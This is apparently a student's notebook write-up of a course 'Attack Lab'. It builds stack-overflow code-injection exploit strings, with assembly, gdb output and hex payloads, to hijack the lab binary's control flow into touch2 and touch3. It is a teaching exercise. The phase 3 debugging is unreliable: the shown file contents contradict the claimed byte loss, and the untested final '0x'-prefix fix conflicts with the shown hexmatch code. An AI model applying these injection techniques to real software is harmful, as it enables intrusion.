# CS33: Attack Lab

## Phase 2

### Overview

The key technique in phase 2 is code injection, which is carried out in two steps. First, we write the binary instructions onto the runtime stack. Then, by overflowing the buffer, we overwrite the return address of the current stack frame with the starting address of the injected code. This way, when the current procedure returns, execution resumes at the overwritten return address, which is the injected code.

In this phase, what we want to achieve with the injected code is to call another procedure named `touch2` with the cookie as the argument. So, in the injected code, we need to first move the desired argument value for `touch2` into `%rdi`, the register that by convention holds the first argument of a procedure call, and then find some way to call the procedure `touch2`. Because the lab requirement forbids us from using `jmp` or `call` in our injected code, we need to use a combination of stack overflow and `ret` to call `touch2`.

First, we will place the address of `touch2` in the exploit string. Then, in the injected code, we will adjust the stack pointer so that it points to the injected address of `touch2`. This way, when the injected code executes `ret`, the address of `touch2` is popped off the stack and the program resumes there, as desired.

### Execution

```asm
Dump of assembler code for function getbuf:
   0x0000000000401847 <+0>:	sub    $0x28,%rsp
   0x000000000040184b <+4>:	mov    %rsp,%rdi
   0x000000000040184e <+7>:	callq  0x401a80 <Gets>
   0x0000000000401853 <+12>:	mov    $0x1,%eax
   0x0000000000401858 <+17>:	add    $0x28,%rsp
   0x000000000040185c <+21>:	retq
```

Similar to phase 1, because the stack frame is of size `0x28`, or 40 bytes, we need to supply a 40-byte exploit string to fill the stack frame and then overwrite the return address with another 8 bytes. However, this time we also need to include the injected code in the first 40 bytes, so we cannot simply pad them with `00`.

To get started, we will write down the assembly code we want to inject. The objective of this phase is to call procedure `touch2` with argument `cookie`, whose value is specified in the file `cookie.txt`.

In [1]:
!cat cookie.txt

0x55ca9f6d


In [2]:
!pygmentize phase2.s

movl  $0x55ca9f6d, %edi
sub   $0x10, %rsp
ret


Note that here we need to subtract `0x10` (16 bytes, that is, two 8-byte words) from the stack pointer so that it points to the 8 bytes immediately preceding the return address of the `getbuf` call. Why? Because by the time the computer runs our injected code, it has already returned from `getbuf`, and that `ret` popped the return address, leaving the stack pointer `0x8` above the slot that held it.
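To double check this arithmetic, here is a small sketch in Python. It assumes the buffer address `0x556647a8` that we read from `gdb` later in this phase. The variable names are only for illustration.

```python
BUFFER_ADDR = 0x556647a8   # %rsp inside getbuf (assumed here, found with gdb later)
FRAME_SIZE = 0x28          # from `sub $0x28,%rsp` in getbuf

return_slot = BUFFER_ADDR + FRAME_SIZE   # where getbuf's return address is stored
rsp_after_ret = return_slot + 8          # `ret` pops 8 bytes off the stack
touch2_slot = return_slot - 8            # last 8 bytes of the 40-byte buffer

# How far the injected code must move %rsp down before its own `ret`
adjustment = rsp_after_ret - touch2_slot
print(hex(return_slot), hex(rsp_after_ret), hex(touch2_slot), hex(adjustment))
```

The last value printed is the amount used in `sub $0x10, %rsp`.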

Then, we need to convert it into byte code. One way to do this is to first assemble it into object code and then use `objdump` to get the byte code.

In [3]:
!gcc -c phase2.s -o phase2.o

In [4]:
!objdump -d phase2.o > phase2.d

In [5]:
!cat phase2.d


phase2.o:	file format Mach-O 64-bit x86-64

Disassembly of section __TEXT,__text:
__text:
       0:	bf 6d 9f ca 55 	movl	$1439342445, %edi
       5:	48 83 ec 10 	subq	$16, %rsp
       9:	c3 	retq


So the byte representation of the injected code will be:

```
bf 6d 9f ca 55 48 83 ec 10 c3
```

Based on the design outlined in the Overview, we will pad the exploit string with 00 until the last 16 bytes; the first 8 bytes will be the address of `touch2` and the second 8 will be the address of the injected code, which is simply the address of the buffer. So, the exploit string will be:

```
bf 6d 9f ca 55 48 83 ec 10 c3 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 ADDRESS_OF_TOUCH2 ADDRESS_OF_BUFFER
```

We can find the address of `touch2` by simply examining the disassembled object code, `ctarget.s`.

In [6]:
!cat ctarget.s | grep -A 1 touch2

touch2:
  401889:	48 83 ec 08 	subq	$8, %rsp
--
  40189f:	74 23 	je	35 <touch2+0x3B>
  4018a1:	bf 00 31 40 00 	movl	$4206848, %edi
--
  4018dd:	eb db 	jmp	-37 <touch2+0x31>



The line immediately after the `touch2:` label shows the address of the procedure. Padded to 8 bytes, the address is `0x0000000000401889`. However, we still need to rewrite the address in little-endian byte order and separate each byte with a space. I wrote a small Python helper, `toLittleEndian`, to carry out the task.

In [7]:
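def toLittleEndian(word):
    # Reverse the byte order of a hex string, two hex digits (one byte) at a time,
    # separating the bytes with spaces. The result keeps a trailing space.
    result = ''
    for i in range(0, len(word), 2):
        result = word[i : i + 2] + ' ' + result
    return result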

In [8]:
address_of_touch2 = toLittleEndian('0000000000401889')
address_of_touch2

'89 18 40 00 00 00 00 00 '

Therefore, `ADDRESS_OF_TOUCH2` is `89 18 40 00 00 00 00 00`.
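As an alternative sketch, the same conversion can be done starting from an integer with Python's built-in `int.to_bytes`. The name `to_little_endian` and the `width` parameter are my own choices for illustration, and unlike `toLittleEndian` this version leaves no trailing space.

```python
def to_little_endian(address, width=8):
    """Format an integer address as space-separated little-endian hex bytes."""
    raw = address.to_bytes(width, 'little')   # least significant byte first
    return ' '.join(f'{b:02x}' for b in raw)

print(to_little_endian(0x401889))
```

Working from an integer avoids having to pad the hex string to 16 digits by hand.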

The only thing that remains is to find the address of the buffer, which cannot be found by just looking at the disassembled code because it is allocated at run time. So, we are going to run the code in `gdb` to find it. Below is the result of running `gdb` on the school's designated lab server:

```
(gdb) break getbuf
Breakpoint 1 at 0x401847: file buf.c, line 12.
(gdb) run
Starting program: /w/home.13/class/classtzh/CS33/AttackLab/target40/ctarget
Cookie: 0x55ca9f6d

Breakpoint 1, getbuf () at buf.c:12
12	buf.c: No such file or directory.
(gdb) disassemble
Dump of assembler code for function getbuf:
=> 0x0000000000401847 <+0>:	sub    $0x28,%rsp
   0x000000000040184b <+4>:	mov    %rsp,%rdi
   0x000000000040184e <+7>:	callq  0x401a80 <Gets>
   0x0000000000401853 <+12>:	mov    $0x1,%eax
   0x0000000000401858 <+17>:	add    $0x28,%rsp
   0x000000000040185c <+21>:	retq
End of assembler dump.
(gdb) stepi
14	in buf.c
(gdb) disassemble
Dump of assembler code for function getbuf:
   0x0000000000401847 <+0>:	sub    $0x28,%rsp
=> 0x000000000040184b <+4>:	mov    %rsp,%rdi
   0x000000000040184e <+7>:	callq  0x401a80 <Gets>
   0x0000000000401853 <+12>:	mov    $0x1,%eax
   0x0000000000401858 <+17>:	add    $0x28,%rsp
   0x000000000040185c <+21>:	retq
End of assembler dump.
(gdb) print /x $rsp
$1 = 0x556647a8
```

We can see that the address of the buffer is `0x556647a8`, which, padded to 8 bytes, is `0x00000000556647a8`. We convert it to little-endian again with our Python helper.

In [9]:
buffer_address = toLittleEndian('00000000556647a8')
buffer_address

'a8 47 66 55 00 00 00 00 '

Therefore, `ADDRESS_OF_BUFFER` is `a8 47 66 55 00 00 00 00`.

Since we now have all the puzzle pieces, we can complete the exploit string, which is:

```
bf 6d 9f ca 55 48 83 ec 10 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 89 18 40 00 00 00 00 00 a8 47 66 55 00 00 00 00
```
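As a sanity check, the string can also be assembled programmatically. The helper below is only a sketch: `build_phase2_exploit` and its parameters are hypothetical names, and it assumes the layout described above (injected code first, the address of `touch2` in the last 8 bytes of the 40-byte frame, then the buffer address over the return address).

```python
def build_phase2_exploit(code_hex, touch2_le, buffer_le, frame_size=40):
    """Assemble the phase 2 exploit string from space-separated hex pieces."""
    code = code_hex.split()
    touch2 = touch2_le.split()
    buf = buffer_le.split()
    # Zero padding between the injected code and the touch2 address
    pad = frame_size - len(code) - len(touch2)
    if pad < 0:
        raise ValueError('injected code does not fit in the stack frame')
    return ' '.join(code + ['00'] * pad + touch2 + buf)

phase2_exploit = build_phase2_exploit(
    'bf 6d 9f ca 55 48 83 ec 10 c3',
    '89 18 40 00 00 00 00 00',
    'a8 47 66 55 00 00 00 00',
)
print(len(phase2_exploit.split()))   # total number of bytes in the exploit
print(phase2_exploit)
```

The byte count should come out to 48: 40 bytes for the frame plus 8 for the overwritten return address.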

We then tested it on the server, and it worked.

```
# ./hex2raw < phase2.txt | ./ctarget
Cookie: 0x55ca9f6d
Type string:Touch2!: You called touch2(0x55ca9f6d)
Valid solution for level 2 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
```

## Phase 3

This phase is, again, a code injection attack. Unlike Phase 2, this time we need to pass a string that matches the cookie as the argument to procedure `touch3`.

```c
/* Compare string to hex representation of unsigned value */
int hexmatch(unsigned val, char *sval) {
  char cbuf[110];
  /* Make position of check string unpredictable */
  char *s = cbuf + random() % 100;
  sprintf(s, "%.8x", val);
  return strncmp(sval, s, 9) == 0;
}

void touch3(char *sval)
{
    vlevel = 3;       /* Part of validation protocol */
    if (hexmatch(cookie, sval)) {
        printf("Touch3!: You called touch3(\"%s\")\n", sval);
        validate(3);
    } else {
        printf("Misfire: You called touch3(\"%s\")\n", sval);
        fail(3); 
    }
    exit(0); 
}
```

The `hexmatch` procedure that checks the string input seems complicated. However, all it does is randomize where on the stack it stores the hex string of `val`, so that we cannot pass the check by simply guessing the location of that buffer and writing into it by overflowing the stack. As long as we pass the `cookie` value as a string of hex digits into `hexmatch`, we will be able to pass the check.
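To see what `hexmatch` actually compares, here is a rough Python model of it. This is a sketch, not the lab's code: it ignores the random placement of `s` (which does not affect the comparison) and treats `sval` as the raw bytes sitting at the pointer. The name `hexmatch_model` is made up for illustration.

```python
def hexmatch_model(val, sval):
    """Model of hexmatch: sval is the raw memory starting at the string pointer."""
    # sprintf(s, "%.8x", val) writes 8 lowercase hex digits plus a terminating NUL
    expected = ('%.8x' % val).encode('ascii') + b'\x00'
    # strncmp(sval, s, 9) == 0 requires the first 9 bytes, NUL included, to agree
    return sval[:9] == expected

cookie_value = 0x55ca9f6d
print(hexmatch_model(cookie_value, b'55ca9f6d\x00'))   # properly terminated string
print(hexmatch_model(cookie_value, b'55ca9f6dXYZ'))    # no NUL after the 8 digits
```

Under this model, the first call matches and the second does not, because the comparison covers nine bytes rather than eight.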

So first, we need the byte string representation of `cookie`, `55ca9f6d`.

In [41]:
cookie = '55ca9f6d'
def build_cookie_str(cookie):
    return ''.join([hex(ord(char))[2:] + ' ' for char in cookie]) + '00'
cookie_str = build_cookie_str(cookie)
cookie_str

'35 35 63 61 39 66 36 64 00'

Note that we need to add a null character to the string to indicate its ending.
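The same conversion can also be sketched by encoding the text to bytes first, which makes the terminating null byte explicit and always prints two hex digits per byte. The function name `cookie_to_hex_bytes` is hypothetical, chosen only for this example.

```python
def cookie_to_hex_bytes(cookie_text):
    """Return the ASCII bytes of cookie_text plus a NUL terminator as hex pairs."""
    raw = cookie_text.encode('ascii') + b'\x00'   # C strings end with a zero byte
    return ' '.join(f'{b:02x}' for b in raw)

print(cookie_to_hex_bytes('55ca9f6d'))
```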

Now that we have the cookie representation at hand, we will proceed to lay out what we need to inject on the stack.

```
ADDRESS_OF_TOUCH3
OVERWRITE_RETURN_ADDRESS
PADDING
COOKIE_STRING
RET (call touch3)
SET_RDI_TO_THE_ADDRESS_OF_COOKIE_STRING
```

What makes this phase tricky is that the two procedures, `hexmatch` and `touch3`, push data onto the stack when called. So if we accidentally put our injected code in the locations these two procedures write to, our code will be overwritten. To make it safe, we are going to write all our code as low in the stack frame as possible. The lowest we can get is the `buffer`. So we will just write everything together starting at the location of `buffer`.

Here is a prototype of the assembly code we want to inject:

```asm
movq $ADDRESS_OF_COOKIE_STRING, %rdi
ret
```

In our layout, the cookie string is placed right above the injected code on the stack. As a result, in order to get its address, we must first know the exact length of the injected code after assembling. However, the length of the injected code actually depends on the address of the cookie string. For example, if we assemble

```asm
movq $0x0000000000000000, %rdi
ret
```

the result will be

```
48 c7 c7 00 00 00 00 	movq	$0, %rdi
c3 	retq
```

However, if we assemble

```asm
movq $0x0123456789abcdef, %rdi
ret
```

the result will be 

```asm
48 bf ef cd ab 89 67 45 23 01 	movabsq	$81985529216486895, %rdi
c3 	retq
```

The lengths of the two encodings are clearly different. So we need to be careful about what we use as the placeholder for the address. Here, we will use the address of the buffer, `0x556647a8`, which is very close to the actual address.
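The rule behind the two encodings can be sketched in Python. This is a simplified model that only reproduces the two forms shown in the listings above for `%rdi`: a 7-byte form when the immediate fits in a sign-extended 32-bit field, and a 10-byte `movabsq` form otherwise. The function name is hypothetical, and a real assembler may make other choices in cases not covered here.

```python
def encode_mov_imm_to_rdi(imm):
    """Encode `movq $imm, %rdi` as space-separated hex bytes (simplified model)."""
    if -(1 << 31) <= imm < (1 << 31):
        # 48 c7 c7 + 32-bit immediate, sign-extended by the CPU (7 bytes)
        body = bytes([0x48, 0xC7, 0xC7]) + (imm & 0xFFFFFFFF).to_bytes(4, 'little')
    else:
        # 48 bf + full 64-bit immediate, i.e. movabsq (10 bytes)
        body = bytes([0x48, 0xBF]) + (imm & 0xFFFFFFFFFFFFFFFF).to_bytes(8, 'little')
    return ' '.join(f'{b:02x}' for b in body)

for value in (0x0, 0x0123456789abcdef, 0x556647a8):
    encoded = encode_mov_imm_to_rdi(value)
    print(hex(value), len(encoded.split()), encoded)
```

Since every address near the buffer is well below `0x80000000`, the placeholder and the final address should both take the 7-byte form.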

In [12]:
!pygmentize phase3_tmp.s

movq $0x556647a8, %rdi
ret


In [13]:
!gcc -c phase3_tmp.s -o phase3.o

In [14]:
!objdump -d phase3.o > phase3.d

In [15]:
!cat phase3.d


phase3.o:	file format Mach-O 64-bit x86-64

Disassembly of section __TEXT,__text:
__text:
       0:	48 c7 c7 a8 47 66 55 	movq	$1432766376, %rdi
       7:	c3 	retq


In [16]:
len('48 c7 c7 a8 47 66 55 c3'.split())

8

So the byte representation of the injected code will be of length `8`. Adding `8` to the address of the buffer,

In [17]:
cookie_string_address = hex(0x556647a8 + 8)
cookie_string_address

'0x556647b0'

So the address of the cookie string in our stack layout will be `0x556647b0`. We will then change the address placeholder in `phase3.s` to `0x556647b0`.

In [18]:
!pygmentize phase3.s

movq $0x556647b0, %rdi
ret


In [19]:
!gcc -c phase3.s -o phase3.o && objdump -d phase3.o > phase3.d && cat phase3.d


phase3.o:	file format Mach-O 64-bit x86-64

Disassembly of section __TEXT,__text:
__text:
       0:	48 c7 c7 b0 47 66 55 	movq	$1432766384, %rdi
       7:	c3 	retq


Observe that the length of the instruction does not change. Thus, we now can be certain that the byte code representation of the injected code will be:

```
48 c7 c7 b0 47 66 55 c3
```

In [20]:
injected_code = '48 c7 c7 b0 47 66 55 c3'

In [21]:
exploit_string_build = injected_code + ' ' + cookie_str
exploit_string_build

'48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00'

Now we need to add the padding to the exploit string. Because the stack frame is 40 bytes, we first need to pad the string to 40 bytes before we can start overwriting the return address.

In [22]:
exploit_string_build = exploit_string_build + ' ' + (40 - len(exploit_string_build.split())) * '00 '
exploit_string_build

'48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 '

Now we can add the starting address of the injected code, which is the address of the buffer, to the exploit string. It will overwrite the return address.

In [23]:
exploit_string_build = exploit_string_build + buffer_address
exploit_string_build

'48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 '

The last piece of the puzzle will be the address of `touch3`. We can easily find that out by searching through `ctarget.s`.

In [24]:
!cat ctarget.s | grep -A 1 touch3

touch3:
  40195e:	53 	pushq	%rbx
--
  40197c:	74 26 	je	38 <touch3+0x46>
  40197e:	48 89 de 	movq	%rbx, %rsi
--
  4019c0:	eb d8 	jmp	-40 <touch3+0x3C>



So the address of `touch3` is `0x000000000040195e`.

In [25]:
address_of_touch3 = toLittleEndian('000000000040195e')
address_of_touch3

'5e 19 40 00 00 00 00 00 '

Adding it to the existing pieces of exploit string, we shall get the final build.

In [26]:
exploit_string_build += address_of_touch3
exploit_string_build = exploit_string_build.strip()
exploit_string_build

'48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 5e 19 40 00 00 00 00 00'

Here we sum up how we build the exploit string:

In [39]:
def build_exploit_string(injected_code, cookie_str, buffer_address, address_of_touch3):
    result = injected_code + ' ' + cookie_str
    # Add Padding
    result += ' ' + (40 - len(result.split())) * '00 '    
    result += buffer_address
    result += address_of_touch3
    result = result.strip()
    return result

test = build_exploit_string(injected_code, cookie_str, buffer_address, address_of_touch3)
test

'48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 5e 19 40 00 00 00 00 00'

In [40]:
test == exploit_string_build

True

### Testing

I stored the key in `phase3.txt` and attempted to solve phase 3 with it, but failed with a segmentation fault. Because the exploit string itself is not long enough to cause the problem, the reason must lie somewhere else. The lab instructions note that "when functions `hexmatch` and `strncmp` are called, they push data onto the stack, overwriting portions of memory that held the buffer used by getbuf". That could be a possible explanation. To figure things out, I decided to use `gdb` to step through the program.

Here is a tip that might come in handy with `gdb`. We can still use input redirection in the `gdb` interface. Simply type

```bash
run < file_to_redirect
```

However, we cannot run another binary from within the interface. So, we need to first generate a file that can be redirected as the input. (Because `hex2raw` is compiled for the SEASNET server and I cannot figure out a way to run Jupyter Notebook there, I will just put the command here as text.)

```bash
./hex2raw < phase3.txt > phase3_raw.txt
```
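If `hex2raw` is not available on the machine at hand, the conversion for a plain file like ours can be sketched in Python. This assumes the input contains nothing but whitespace-separated hex pairs. `hex_text_to_raw` and `hex_file_to_raw` are hypothetical helper names, not part of the lab tools.

```python
def hex_text_to_raw(hex_text):
    """Convert whitespace-separated hex pairs into the raw bytes they describe."""
    # Drop all whitespace first so newlines and repeated spaces are harmless
    return bytes.fromhex(''.join(hex_text.split()))

def hex_file_to_raw(hex_path, raw_path):
    """Read a hex text file and write the decoded bytes; return the byte count."""
    with open(hex_path) as src:
        raw = hex_text_to_raw(src.read())
    with open(raw_path, 'wb') as dst:   # binary mode: no newline translation
        dst.write(raw)
    return len(raw)

print(hex_text_to_raw('a8 47 66 55 00 00 00 00\n'))
```

Calling `hex_file_to_raw('phase3.txt', 'phase3_raw.txt')` would then produce a file that can be fed to `run < phase3_raw.txt` inside `gdb`.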

After debugging in `gdb`, I found that the segmentation fault occurred when returning from `getbuf`. After further examination, I found that `$rsp` did not hold the address it should hold. So I looked into `phase3.txt`.

In [27]:
!cat phase3.txt

48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 5e 19 40 00 00 00 00 00


Somehow, when I copied the string from the cell above into Vim in the terminal, the first two bytes disappeared. I have long been aware that copying into the terminal can lead to unpredictable behavior because the integration is not perfect, but this is the first time I paid a real price for it.

To avoid future incidents like this, I will refrain from copying and pasting into or out of the terminal. If it is unavoidable, I will double check the result. In this case, we can simply write the text file with Python right in the notebook and avoid such fragile behavior.

In [28]:
# Write the exploit string straight from the notebook; the file is closed automatically
with open("phase3.txt", 'w') as file:
    file.write(exploit_string_build + '\n')

In [29]:
cat phase3.txt

48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 5e 19 40 00 00 00 00 00
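To make the "double check" step mechanical, a comparison like the following could be used. It is only a sketch, and `first_mismatch` is a made-up helper name. It compares two hex strings byte by byte and reports where they first differ, which would have pointed straight at the dropped bytes.

```python
def first_mismatch(actual_hex, expected_hex):
    """Return the index of the first differing byte, or None if both match."""
    actual = actual_hex.split()
    expected = expected_hex.split()
    for i, (a, e) in enumerate(zip(actual, expected)):
        if a.lower() != e.lower():
            return i
    if len(actual) != len(expected):
        # One string is a prefix of the other: they differ where the shorter ends
        return min(len(actual), len(expected))
    return None

print(first_mismatch('48 c7 c7 b0', '48 c7 c7 b0'))   # identical inputs
print(first_mismatch('c7 b0', '48 c7 c7 b0'))         # leading bytes missing
```

In the notebook, this could be called as `first_mismatch(open('phase3.txt').read(), exploit_string_build)`.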


We went back to the server and experimented with the new key. Cheers, the segmentation fault is gone. However, we got another problem.

```
Type string:Misfire: You called touch3("55ca9f6d�GfU")
```

Apparently the string argument turned out to be not quite what we wanted. It should be:

In [30]:
cookie

'55ca9f6d'

It seems that the string did not terminate at its end. However, I did not forget to include the null character at the end.

In [31]:
cookie_str

'35 35 63 61 39 66 36 64 00'

So I could not figure out what went wrong just by looking at my key. It looks perfectly fine. Once more, I need to rely on `gdb`.

I set a breakpoint at `touch3`, and when it was hit, I checked its argument with `x/s $rdi`, which prints the first argument as a string. The result is:

```
(gdb) x/s $rdi
0x556647b0:	"55ca9f6d"
```

Nothing wrong there either. We could only suspect that the argument needs to be `0x55ca9f6d` instead of `55ca9f6d`.

In [42]:
cookie_str = build_cookie_str('0x55ca9f6d')
cookie_str

'30 78 35 35 63 61 39 66 36 64 00'

In [43]:
exploit_string = build_exploit_string(injected_code, cookie_str, buffer_address, address_of_touch3)
exploit_string

'48 c7 c7 b0 47 66 55 c3 30 78 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 5e 19 40 00 00 00 00 00'

In [44]:
# Write the newly built exploit_string (not the earlier exploit_string_build)
with open("phase3.txt", 'w') as file:
    file.write(exploit_string + '\n')